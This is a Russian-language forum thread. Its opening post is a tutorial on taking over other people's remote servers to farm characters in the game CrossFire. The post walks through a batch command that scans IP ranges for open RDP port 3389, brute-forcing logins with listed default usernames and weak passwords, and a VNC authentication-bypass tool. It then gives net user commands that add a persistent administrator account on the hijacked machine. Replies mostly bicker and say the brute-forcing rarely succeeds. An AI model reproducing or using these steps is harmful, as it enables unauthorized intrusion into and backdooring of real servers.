Качаем перса с помощью Dedicated Servers!

Статус
В этой теме нельзя размещать новые ответы.

St1le

Новичок
Лайки
1
Баллы
0
[HIDE=10]И так для начала я напишу тем, кто не знает, что-же такое Dedicated Servers (или проще говоря дедик): Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Servers - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. У дедика при фраминге есть один существенный плюс: его IP собственный, что уменьшает вероятность бана! А если вам ещё удалось сбрутить дедик, к примеру из Австралии то Администрация CrossFire будет "биться" за этого пользователя!
Теперь перейдём к самому "заполучению" дедика.
Итак, для брута нам понадобится (ВТ нету так как архив)(сканер портов) и сам брут(я буду использовать v3.5(ВТ нету так как архив) (Fre3dz modification) Вот вы все скачали, теперь нам нужны IP для брута, заходим в папку со сканером и создаем .bat файл с таким текстом: VNC.exe -i 62.16.32.0-62.16.66.255 -p 3389 -cT -T 5000 Где: 62.16.32.0-62.16.66.255 - диапазон, это для примера, вы должны вписать свой. Диапазоны ипов для стран можно посмотреть тут. 3389 - порт. Сохраняем наш батник и запускаем, начинается скан IP на открытый 3389 порт. После того, как скан закончился, список ипов будт лежать в файле VNC_bypauth.txt, открываем его и стираем все кроме ипов, то есть у вас должен получится список типа: Код:
82.209.192.0 82.209.255.255 62.5.128.0 62.5.255.255 62.5.128.3 62.5.128.180 62.5.129.2 62.5.128.186 62.5.128.184 62.5.128.185
Дальше идем в папку с брутом и засовываем список ипов в ips.txt. В logins.txt суем как не странно логины Код:
administrator admin sys user guest
А в passwords.txt пароли. Код:
123 1234 12345 123456 1234567 admin admin1 administrator server 1q2w3e4r q1w2e3r4 password pass login access
Если хотите, можете придумать свои списки логинов и пассов. Вот и все, брут готов к работе, запускаем, жмем внизу старт и идем гулять Погуляв приходим и видим Good: (хз скока, поначалу вряlли многj) бежим открывать good.txt и видим нечто подобное: [tyt ip deda]:user;123456 Далее идем в пуск-стандартные-связь-подключение к удаленному рабочему столу и пишем туда ип. Тыкаем подключиться, патом вводим логин(у нас это user) и пасс(123456) и тыкаем ОК. Теперь дед в вашей власти, идем создавать учетку, для этого проделайте следующие шаги: 1. Открываем командную строку(Пуск-Выполнить-cmd) 2. Вводим по очереди эти строчки: Код:
net user LOGIN PASS /add net localgroup Administrators LOGIN /add net localgroup "Remote Desktop Users" LOGIN /add net accounts /maxpwage:unlimited exit
Все, учетка создана!Дальше входите на дед в вашу учетку.Я думаю что многие не знают как это сделать, так-что напишу:подключиться к дедику можно с помощью встроенного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запустите ее и вводи ip адрес дедика. Можно еще конечно Радмином юзать дедик если он установлен на дедике. Теперь скачиваем и устанавливаем CrossFire(я думаю все знают как это делать). Ещё нам понадобится АФК-бот(сейчас рабочего нет но есть один маленький баг: заходим в игру и открываем чат пишем 2-3 слова (типа рвопанымивфо) и все АФК-бот готов! Но всё-таки лучше иногда переключаться и добавлять пару букв.) Теперь переключаемся на наш комп и тоже коннектимся в тот-же зал что и с дедика(его лучше поставить под пароль!).
Пароль на скачку 147
Кто непонял - видео заодно в друзья добавьтесь)
Жду спасибки за старание, ну или + в репу!
[/HIDE]

Последнее редактирование модератором:

Шторм

Новичок
Лайки
0
Баллы
0
Пффф, я понимаю что это не жук. Но всё же я полезное что то даю форуму. Ты что то даешь? Тупо ФЛУДИШЬ. Лес там -------->

Прежде чем что-то писать советую погуглить.Не выделывайся.
Что даю я?Я не сую под огромные хайды то что можно скачать на жуке.
Это твое "полезное" засоряет форум.Вроде все высказал.
Плюсую админа.Если такое можно скачать с жука смысл копить сообщения тут.Тем более текст не твой.

хХхСмЕрТьхХх

Батька
Новичок
Лайки
50
Баллы
48
Скажу что ета прога подбирает логины и пароли от дедика
Сканер ищет дедики (Туда нужно вписывать диапазоны адресов)(пишите в лс за диапазонами)
Брут тупо подбирает логин и пас к дедику
Очень долго и нудно..
Короче я мучался мучался Брутил но так и пас верный неподобрал!
Лучше время не теряйте на ето лучше качайтесь!

XzZachemNik

Забанен
Лайки
6
Баллы
0
Скажу что ета прога подбирает логины и пароли от дедика
Сканер ищет дедики (Туда нужно вписывать диапазоны адресов)(пишите в лс за диапазонами)
Брут тупо подбирает логин и пас к дедику
Очень долго и нудно..
Короче я мучался мучался Брутил но так и пас верный неподобрал!
Лучше время не теряйте на ето лучше качайтесь!
Эмм,есть много порталов,где идет раздача дедиков,причем в очень большом количестве.Так что ты не крут)

Статус
В этой теме нельзя размещать новые ответы.
Сверху